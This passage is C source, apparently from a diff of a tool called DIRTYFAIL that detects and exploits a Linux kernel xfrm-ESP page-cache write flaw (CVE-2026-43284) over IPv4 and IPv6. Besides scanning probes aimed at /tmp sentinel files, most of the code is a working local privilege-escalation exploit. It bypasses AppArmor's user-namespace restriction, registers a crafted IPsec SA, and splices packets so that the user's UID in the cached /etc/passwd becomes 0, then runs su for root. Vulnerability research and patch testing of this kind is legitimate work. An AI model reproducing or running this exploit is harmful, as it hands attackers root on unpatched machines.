log_bad("active-probe: netlink xfrm: %s", strerror(errno));
return DF_TEST_ERROR;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("active-probe: bind netlink: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!bring_lo_up()) {
log_bad("active-probe: bring lo up: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_TEST_ERROR;
}
if (!trigger_store_at(sentinel, 0)) {
close(nl); return DF_TEST_ERROR;
}
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t dirtyfrag_esp_active_probe(void)
{
/* Sentinel file: 4 KiB of 'A' bytes. */
char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
/* Fault the page in. */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("active-probe inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
/* Re-read sentinel and search for marker. */
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i);
return DF_VULNERABLE;
}
}
log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched");
return DF_OK;
}
+40
@@ -0,0 +1,40 @@
/*
* DIRTYFAIL dirtyfrag_esp.h
*
* Public surface for the Dirty Frag xfrm-ESP variant (CVE-2026-43284).
*/
#ifndef DIRTYFAIL_DIRTYFRAG_ESP_H
#define DIRTYFAIL_DIRTYFRAG_ESP_H
#include "common.h"
/* Run all preconditions for the xfrm-ESP primitive. Detection here is
* precondition-only: we do not register an SA in detect mode because
* doing so requires a fresh user namespace and side-effects loopback
* routing inside that namespace. Returns DF_VULNERABLE if all
* prerequisites are satisfied. */
df_result_t dirtyfrag_esp_detect(void);
/* OUTER (init namespace): user prompts → resolve target → fork →
* wait for child to do the kernel work → read global page cache to
* verify → if do_shell, execlp("su", user) in init ns for REAL
* init-ns root via PAM. */
df_result_t dirtyfrag_esp_exploit(bool do_shell);
/* INNER (bypass userns): runs after AA bypass stage 2. Reads
* DIRTYFAIL_TARGET_USER from env, registers XFRM SA with seq_hi
* "0000", fires the splice trigger. No prompts, no su, no verify;
* the parent owns those. Exits with df_result_t cast to int. */
df_result_t dirtyfrag_esp_exploit_inner(void);
/* Active probe: fires the v4 ESP-in-UDP trigger against a /tmp sentinel
* file (never /etc/passwd) and reports whether the marker landed.
* Used by `--scan --active`. The inner half runs in the bypass userns
* and reads DIRTYFAIL_PROBE_SENTINEL for the target path. Returns
* DF_VULNERABLE on marker hit, DF_OK if patched, DF_PRECOND_FAIL on
* AA-block, DF_TEST_ERROR otherwise. */
df_result_t dirtyfrag_esp_active_probe(void);
df_result_t dirtyfrag_esp_active_probe_inner(void);
#endif
+698
@@ -0,0 +1,698 @@
/*
* DIRTYFAIL dirtyfrag_esp6.c: Dirty Frag IPv6 xfrm-ESP variant
* CVE-2026-43284 (IPv6 path)
*
* Reuses the same primitive shape as `dirtyfrag_esp.c`. See that file
* for the underlying root-cause analysis. This module differs only in
* the network-layer transport (AF_INET6 / ::1) and in padding the ESP
* frame to clear the v6-only size gate.
*/
#include "dirtyfrag_esp6.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifdef __linux__
#include <sched.h>
#include <sys/syscall.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
unsigned int flags);
#endif
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP 50
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xDEADBE60
#define MARKER "0000"
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
/* xfrm6_input.c rejects skb->len < 48. Our wire layout is
* SPI(4)+seq(4)+IV(16)+target(16)+pad = 40+pad. Pad to 48 bytes. */
#define V6_PAD_BYTES 8
/* Empirical STORE-offset shift between v4 and v6 paths.
*
* In v4, the authencesn scratch-write at dst[assoclen+cryptlen]=dst[24]
* lands at file_offset == splice_off (we proved this end-to-end on Ubuntu
* 24.04, kernel 6.8.0-111). In v6, with our [hdr(24)][passwd(16)][pad(8)]
* wire layout, the STORE empirically lands at splice_off + 9. The exact
* source of the +9 isn't fully understood (likely a frag-vs-linear
* accounting wrinkle in esp6_input's skb_to_sgvec), but it is consistent
* across runs at this kernel revision.
*
* We compensate by splicing from passwd_off - V6_STORE_SHIFT, so the
* STORE lands at the intended target offset. Re-test on different kernel
* versions; this constant may need recalibration. */
#define V6_STORE_SHIFT 9
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp6_detect(void)
{
log_step("Dirty Frag — IPv6 xfrm-ESP variant (CVE-2026-43284 v6 path) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
bool esp6 = kmod_loaded("esp6");
log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_ok("v6 xfrm-ESP variant unreachable without unprivileged userns");
log_hint("if you are on Ubuntu, try with --aa-bypass to defeat the restriction");
return DF_PRECOND_FAIL;
}
/* Quick AF_INET6 reachability probe. */
int s = socket(AF_INET6, SOCK_DGRAM, 0);
if (s < 0) {
log_ok("AF_INET6 unavailable (%s) — v6 path not reachable",
strerror(errno));
return DF_PRECOND_FAIL;
}
close(s);
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — same hardening that blocks v4 also blocks v6 "
"(unprivileged userns has no caps).");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing v6 ESP-in-UDP trigger against /tmp sentinel");
df_result_t pr = dirtyfrag_esp6_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE (preconditions met) — v6 xfrm SA registration available");
log_warn("Apply mainline patch f4c50a4034e6 (covers both v4 and v6)");
log_warn("Some distro backports may have shipped v4-only — test both paths");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* Exploit
* ---------------------------------------------------------------- */
#ifdef __linux__
static bool wproc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, value, strlen(value));
close(fd);
return n == (ssize_t)strlen(value);
}
static bool xfrm6_register_sa(int nl, const unsigned char seq_hi[4])
{
char buf[2048] = {0};
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
struct xfrm_usersa_info *usa =
(struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_type = XFRM_MSG_NEWSA;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
nlh->nlmsg_seq = 1;
/* IPv6 selectors / SA addresses. ::1 = {0,...,0,1}. */
static const struct in6_addr loop6 = IN6ADDR_LOOPBACK_INIT;
memcpy(&usa->sel.daddr.a6, &loop6, 16);
memcpy(&usa->sel.saddr.a6, &loop6, 16);
usa->sel.family = AF_INET6;
usa->sel.prefixlen_d = 128;
usa->sel.prefixlen_s = 128;
memcpy(&usa->id.daddr.a6, &loop6, 16);
usa->id.spi = htonl(ESP_SPI);
usa->id.proto = IPPROTO_ESP;
memcpy(&usa->saddr.a6, &loop6, 16);
usa->lft.soft_byte_limit = (uint64_t)-1;
usa->lft.hard_byte_limit = (uint64_t)-1;
usa->lft.soft_packet_limit = (uint64_t)-1;
usa->lft.hard_packet_limit = (uint64_t)-1;
usa->reqid = 0x1234;
usa->family = AF_INET6; /* <-- v6 */
usa->mode = XFRM_MODE_TRANSPORT;
usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
usa->flags = XFRM_STATE_ESN;
size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
size_t attrs = 0;
char *abuf = buf + hdrlen;
/*
* Same authencesn-as-composition story as the v4 path; see the
* comment block in dirtyfrag_esp.c::xfrm_register_sa for why we
* register two separate attributes instead of XFRMA_ALG_AEAD.
*/
{ /* XFRMA_ALG_AUTH_TRUNC */
struct xfrm_algo_auth *aa;
unsigned short dlen = sizeof(*aa) + 32;
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_AUTH_TRUNC;
r->rta_len = RTA_LENGTH(dlen);
aa = (struct xfrm_algo_auth *)RTA_DATA(r);
memset(aa, 0, dlen);
strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
aa->alg_key_len = 32 * 8;
aa->alg_trunc_len = 128;
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ALG_CRYPT */
struct xfrm_algo *ea;
unsigned short dlen = sizeof(*ea) + 16;
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_CRYPT;
r->rta_len = RTA_LENGTH(dlen);
ea = (struct xfrm_algo *)RTA_DATA(r);
memset(ea, 0, dlen);
strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
ea->alg_key_len = 16 * 8;
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_REPLAY_ESN_VAL — same primitive input as v4 */
struct xfrm_replay_state_esn *esn;
unsigned short dlen = sizeof(*esn) + 4;
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_REPLAY_ESN_VAL;
r->rta_len = RTA_LENGTH(dlen);
esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
memset(esn, 0, dlen);
esn->bmp_len = 1;
esn->seq = 100;
memcpy(&esn->seq_hi, seq_hi, 4);
esn->replay_window = 32;
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ENCAP — UDP/4500 */
struct xfrm_encap_tmpl *enc;
unsigned short dlen = sizeof(*enc);
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ENCAP;
r->rta_len = RTA_LENGTH(dlen);
enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
memset(enc, 0, dlen);
enc->encap_type = UDP_ENCAP_ESPINUDP;
enc->encap_sport = htons(ENCAP_PORT);
enc->encap_dport = htons(ENCAP_PORT);
attrs += RTA_SPACE(dlen);
}
nlh->nlmsg_len = hdrlen + attrs;
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
if (sendto(nl, buf, nlh->nlmsg_len, 0,
(struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
return false;
char ack[4096];
ssize_t n = recv(nl, ack, sizeof(ack), 0);
if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
struct nlmsghdr *r = (struct nlmsghdr *)ack;
if (r->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
if (e->error != 0) {
log_bad("XFRM_MSG_NEWSA(v6): %s", strerror(-e->error));
return false;
}
}
return true;
}
static bool bring_lo_up_v6(void)
{
int s = socket(AF_INET6, SOCK_DGRAM, 0);
if (s < 0) return false;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
ifr.ifr_flags = IFF_UP | IFF_RUNNING;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
return rc == 0;
}
/* Generalized v6 trigger: splice from `target_path` at `splice_off`,
* len 16 bytes. The STORE lands at file_offset (splice_off + shift)
* where `shift` is empirically determined per-kernel (see
* calibrate_v6_shift below). Use this directly if you already know
* the shift; for the production exploit path, callers go through
* trigger_store_v6() which compensates automatically. */
static bool trigger_store_v6_at(const char *target_path, loff_t splice_off)
{
int udp_recv = socket(AF_INET6, SOCK_DGRAM, 0);
if (udp_recv < 0) return false;
struct sockaddr_in6 addr;
memset(&addr, 0, sizeof(addr));
addr.sin6_family = AF_INET6;
addr.sin6_port = htons(ENCAP_PORT);
addr.sin6_addr = in6addr_loopback;
int reuse = 1;
setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("bind v6 udp_recv: %s", strerror(errno));
close(udp_recv); return false;
}
int encap = UDP_ENCAP_ESPINUDP;
if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
log_bad("UDP_ENCAP v6: %s", strerror(errno));
close(udp_recv); return false;
}
int udp_send = socket(AF_INET6, SOCK_DGRAM, 0);
if (udp_send < 0) { close(udp_recv); return false; }
if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("connect v6 udp_send: %s", strerror(errno));
close(udp_recv); close(udp_send); return false;
}
/* Wire ESP header (24B) — same as v4. */
unsigned char wire_hdr[24];
*(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(wire_hdr + 4) = htonl(101);
memset(wire_hdr + 8, 0xCC, 16);
/* v6 padding to clear the size gate. */
unsigned char pad[V6_PAD_BYTES] = {0};
int pfd = open(target_path, O_RDONLY);
if (pfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
close(udp_recv); close(udp_send); return false;
}
int p[2];
if (pipe(p) < 0) {
log_bad("pipe: %s", strerror(errno));
close(pfd); close(udp_recv); close(udp_send); return false;
}
/* Compose: hdr(24) || target@off(16) || pad(V6_PAD_BYTES) */
struct iovec iov_hdr = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
if (vmsplice(p[1], &iov_hdr, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
log_bad("vmsplice hdr: %s", strerror(errno));
goto fail;
}
{
loff_t off = splice_off;
if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
log_bad("splice file->pipe: %s", strerror(errno));
goto fail;
}
}
{
struct iovec iov_pad = { .iov_base = pad, .iov_len = V6_PAD_BYTES };
if (vmsplice(p[1], &iov_pad, 1, 0) != V6_PAD_BYTES) {
log_bad("vmsplice pad: %s", strerror(errno));
goto fail;
}
}
if (splice(p[0], NULL, udp_send, NULL,
24 + 16 + V6_PAD_BYTES, SPLICE_F_MOVE)
!= 24 + 16 + V6_PAD_BYTES) {
log_bad("splice pipe->udp v6: %s", strerror(errno));
goto fail;
}
close(p[0]); close(p[1]);
/* See the comment in dirtyfrag_esp.c::trigger_store on why we
* need to wait before tearing down sockets. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);
close(pfd); close(udp_recv); close(udp_send);
return true;
fail:
close(p[0]); close(p[1]);
close(pfd); close(udp_recv); close(udp_send);
return false;
}
/* Calibrate V6_STORE_SHIFT empirically against a sentinel file in /tmp.
*
* We fire the v6 trigger once with marker bytes "0000" spliced from
* sentinel offset 0, then re-read the sentinel and find where "0000"
* landed. The offset is the kernel's STORE shift for this build of
* esp6_input. Caller then splices from `uid_off - shift` for the real
* exploit so the STORE lands exactly at uid_off.
*
* Returns shift in [0, 60] on success (the 4-byte marker is searched
* within the first 64 bytes), or -1 if the marker didn't land at all
* (kernel may be patched, or trigger setup failed). */
static int calibrate_v6_shift(void)
{
/* Build a 4 KiB sentinel filled with a recognizable pattern that
* cannot collide with our marker "0000". We use ASCII 'A' bytes. */
char tmpl[] = "/tmp/dirtyfail-v6-cal.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("calibration: mkstemp: %s", strerror(errno)); return -1; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return -1;
}
close(sfd);
/* Fault the page in. */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return -1; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return -1;
}
close(rfd);
/* Fire the trigger from sentinel offset 0. The SA registered by the
* caller carries seq_hi="0000" (MARKER), so the STORE writes those
* 4 bytes somewhere in the sentinel page. */
bool ok = trigger_store_v6_at(tmpl, 0);
if (!ok) {
log_bad("calibration: v6 trigger failed");
unlink(tmpl);
return -1;
}
/* Re-read the sentinel via a fresh fd (page-cache view, not disk). */
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return -1; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return -1;
/* Search the first 64 bytes for the marker. We expect it to land
* within ~32 bytes of offset 0 based on prior empirical tests. */
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_ok("v6 calibration: STORE landed at sentinel offset %d", i);
return i;
}
}
log_warn("v6 calibration: marker '%s' did not land in sentinel — "
"kernel may be patched, or trigger didn't fire", MARKER);
return -1;
}
/* Production v6 trigger: calibrates the shift on first call, then
* splices from passwd_off - shift so the STORE lands at passwd_off. */
static int g_v6_shift = -1; /* lazy-init by trigger_store_v6 */
static bool trigger_store_v6(off_t passwd_off)
{
if (g_v6_shift < 0) {
g_v6_shift = calibrate_v6_shift();
if (g_v6_shift < 0) {
log_warn("v6 calibration failed; falling back to hard-coded "
"V6_STORE_SHIFT=%d (may be wrong for this kernel)",
V6_STORE_SHIFT);
g_v6_shift = V6_STORE_SHIFT;
}
}
loff_t off = (passwd_off >= g_v6_shift) ? passwd_off - g_v6_shift : 0;
return trigger_store_v6_at("/etc/passwd", off);
}
__attribute__((unused))
static int run_v6_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("unshare v6: %s", strerror(errno));
return 1;
}
wproc("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_uid);
wproc("/proc/self/uid_map", m);
snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_gid);
wproc("/proc/self/gid_map", m);
if (!bring_lo_up_v6()) {
log_bad("bring lo up (v6): %s", strerror(errno));
return 1;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) { log_bad("netlink xfrm: %s", strerror(errno)); return 1; }
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("bind netlink: %s", strerror(errno));
close(nl); return 1;
}
if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return 1;
}
log_ok("v6 XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store_v6(passwd_off)) { close(nl); return 1; }
log_ok("v6 ESP-in-UDP trigger fired");
close(nl);
return 0;
}
#else
__attribute__((unused))
static int run_v6_in_userns(off_t a, uid_t b, gid_t c) {
(void)a; (void)b; (void)c; return 1;
}
#endif
/* INNER (bypass userns): SA reg + trigger only. */
df_result_t dirtyfrag_esp6_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' not 4 chars", uid_str);
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) { log_bad("inner: netlink xfrm: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("inner: bind netlink: %s", strerror(errno));
close(nl); return DF_EXPLOIT_FAIL;
}
if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_EXPLOIT_FAIL;
}
log_ok("inner: v6 XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store_v6(uid_off)) { close(nl); return DF_EXPLOIT_FAIL; }
log_ok("inner: v6 ESP-in-UDP trigger fired at uid_off=%lld", (long long)uid_off);
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
/* OUTER (init ns): prompts → fork bypass child → wait → verify → su. */
df_result_t dirtyfrag_esp6_exploit(bool do_shell)
{
log_step("Dirty Frag (IPv6 xfrm-ESP) — exploit");
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root in init namespace — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to run xfrm-ESP6 page-cache write against /etc/passwd");
log_warn("over ::1 with %d-byte padding to clear xfrm6_input size gate",
V6_PAD_BYTES);
if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; }
if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; }
setenv("DIRTYFAIL_INNER_MODE", "esp6", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, MARKER, 4) != 0) {
log_bad("v6 write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0 (via v6 path)", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe used by `--scan --active`.
*
* Same shape as the v4 active probe: registers an SA in a fresh
* userns and fires the trigger against a sentinel /tmp file. The
* parent re-reads the sentinel and looks for the marker.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp6_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("active-probe v6: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
if (!bring_lo_up_v6()) {
log_bad("active-probe v6: bring lo up: %s", strerror(errno));
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("active-probe v6: netlink xfrm: %s", strerror(errno));
return DF_TEST_ERROR;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("active-probe v6: bind netlink: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_TEST_ERROR;
}
/* Splice from sentinel offset 0; we don't need uid_off math here. */
if (!trigger_store_v6_at(sentinel, 0)) {
close(nl); return DF_TEST_ERROR;
}
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t dirtyfrag_esp6_active_probe(void)
{
char tmpl[] = "/tmp/dirtyfail-esp6-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("probe v6 mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "esp6-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("active-probe v6 inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_warn("ACTIVE PROBE v6: STORE landed at offset %d → kernel is VULNERABLE", i);
return DF_VULNERABLE;
}
}
log_ok("ACTIVE PROBE v6: page intact — kernel esp6 path appears patched");
return DF_OK;
}
+46
@@ -0,0 +1,46 @@
/*
* DIRTYFAIL dirtyfrag_esp6.h
*
* IPv6 dual of the xfrm-ESP page-cache write (CVE-2026-43284).
*
* `esp6_input()` carries the same `if (!skb_has_frag_list(skb)) goto
* skip_cow` branch as `esp_input()`. The mainline patch
* f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 covers BOTH v4 and v6,
* but some distro backports may have shipped only the v4 fix,
* particularly when they cherry-picked the ipv4 patch in isolation.
*
* A vulnerable system in the wild may therefore be:
* - patched on v4, vulnerable on v6
* - patched on v6, vulnerable on v4
* - vulnerable on both
*
* This module is the v6 detector + exploit. Differences from the v4
* path:
* - AF_INET6 sockets, ::1 source/dest, sockaddr_in6
* - XFRM SA registered with family=AF_INET6 and 16-byte addresses
* - ESP packet padded to >= 48 bytes total to clear the
* `xfrm6_input.c` size gate (which v4 does not have)
*/
#ifndef DIRTYFAIL_DIRTYFRAG_ESP6_H
#define DIRTYFAIL_DIRTYFRAG_ESP6_H
#include "common.h"
df_result_t dirtyfrag_esp6_detect(void);
/* OUTER (init ns): prompts → fork → wait → verify → su.
* INNER (bypass userns): SA reg + trigger only. */
df_result_t dirtyfrag_esp6_exploit(bool do_shell);
df_result_t dirtyfrag_esp6_exploit_inner(void);
/* Active probe: fires the v6 ESP-in-UDP trigger against a /tmp sentinel
* file (never /etc/passwd) and reports whether the marker landed.
* Used by `--scan --active`. Returns DF_VULNERABLE on marker hit, DF_OK
* if the kernel is patched (no STORE), DF_PRECOND_FAIL if AA-blocked.
* The inner half runs in the bypass userns and reads
* DIRTYFAIL_PROBE_SENTINEL for the target path. */
